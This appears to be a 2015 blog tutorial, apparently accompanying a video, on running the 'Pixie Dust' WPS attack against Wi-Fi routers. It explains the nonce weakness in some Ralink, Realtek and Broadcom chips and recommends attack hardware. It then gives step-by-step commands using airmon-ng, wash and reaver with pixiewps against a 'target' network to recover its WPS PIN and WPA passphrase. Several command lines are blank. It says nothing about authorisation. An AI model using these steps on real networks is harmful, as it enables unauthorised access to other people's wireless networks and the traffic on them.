How To Setting up and using PixieWPS

Published on: Jun 10, 2015 @ 19:14 by Matthew Knight

UPDATE #1: You no longer need to follow this guide if you're using Kali Linux 2.0! PixieWPS comes already installed on it!

This video will show you how to get started using PixieWPS

How PixieWPS works

In summer of 2014, Dominique Bongard discovered what he called the "Pixie Dust" attack. This attack only works for the default WPS implementation of several wireless chip makers, Ralink, Realtek, and Broadcom. The attack focuses on a lack of randomization when generating the E-S1 and E-S2 "secret" nonces. If the attacker can figure out those two nonces, they can crack the pin within 1 second for some devices to about 30 minutes. A tool has been developed named pixiewps and a new version of Reaver has been developed in order to automate the process.

You will need a Compatible Wireless card i recommend these Compatible Wireless Cards:

Compatible Wireless Cards:

Alfa Networks AWUS036H - Works! Alfa Network AWUS036NH - Untested! TP-LINK TL-WN722N - Works!

Getting a low signal to the target network?

Order a WiFi signal amplifier:

WiFi signal amplifier

Signal gain could be increased by as much as -20 dbi.

[NOTE]: If you get a error installing pixiewps you might need to run apt-get update from the Terminal then try again.

Let's get started!

0:30 Command 1:

apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps

0:58 Command 2:

git clone

1:08 Command 3:

cd reaver-wps-fork-t6x/src

1:19 Command 4:


1:29 Command 5:


1:43 Command 6:

make install

2:08 Command 7: Finds what wireless cards are connected.


2:26 Command 8: Replace wlan0 with your wireless card might be wlan0 or wlan1 if more then one wireless card is connected.

airmon-ng start wlan0

2:51 Command 9: Replace wlan0mon with which ever showed up under airmon-ng might be wlan0mon or wlan1mon if mon0 shows you got the wrong aircrack-ng installed.

wash -i wlan0mon

3:14 Command 10: Open a Terminal and type:


3:28 Command 11:

reaver -i wlan0mon -b BSSIDHERE -c Channel#Here -vvv -K 1 -f

Replace wlan0mon with whatever showed up under airmon-ng replace BSSID with your target BSSID replace Channel#Here with Wireless networks channel

-K 1 Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom & Realtek)
-f If -K 1 Fails -f will Brute force the whole keyspace to get the WPS Pin.

4:24 PixieWPS gets the WPS Pin and WPA Wireless security pass phrase of the target network.

List of Vulnerable routers and chip sets.

Vulnerable Routers